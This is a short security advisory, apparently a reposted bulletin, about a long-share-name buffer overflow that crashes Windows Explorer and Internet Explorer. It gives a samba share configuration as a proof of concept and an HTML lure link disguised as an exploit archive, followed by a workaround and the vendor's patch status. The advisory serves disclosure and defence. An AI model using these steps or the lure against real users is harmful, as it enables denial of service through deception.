‘Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow’

Summary

MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are core pieces of Microsoft Windows Operating Systems. An unchecked buffer allows a malicious user to crash Microsoft Explorer by creating a long shared directory name, and convincing the user to access it.

Credit:

‘The information has been provided by Rodrigo Gutierrez.’


Details

Vulnerable Systems:
MS Internet Explorer, MS Explorer (explorer.exe) on Platforms:
 * Windows XP(All), Windows 2000(All), Windows 98(All), Windows ME(All)
 * Windows 2003 not tested

In order to exploit this, an attacker must be able to get a user to connect to a malicious server that contains a share name equal or longer than 300 characters.

Proof of Concept:
Windows will not allow you to create such a long share, but of course samba includes the feature. After your samba box is up and running create a share in your smb.conf:

[A x 300]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung

After your server is up, just get to your windows test box and get to the start menu > run > \your.malicious.server.ip.
Plufff, explorer will crash.

Or By Social Engineering:
<a href=’\my.malicious.server.ip’>Enter My 0day sploit archive l/p:n0ph33r</a>

Workaround:
From your network card settings disable the Client for Microsoft networks until an official fix for this vulnerability is available.

Vendor Status:
Rodrigo Gutierrez notified the vendor in the beginning of 2002, this vulnerability was supposed to be fixed in Windows XP service pack 1 in XP and Windows 2000 SP4 according to the vendors knowledge base article 322857.’

Categories: Windows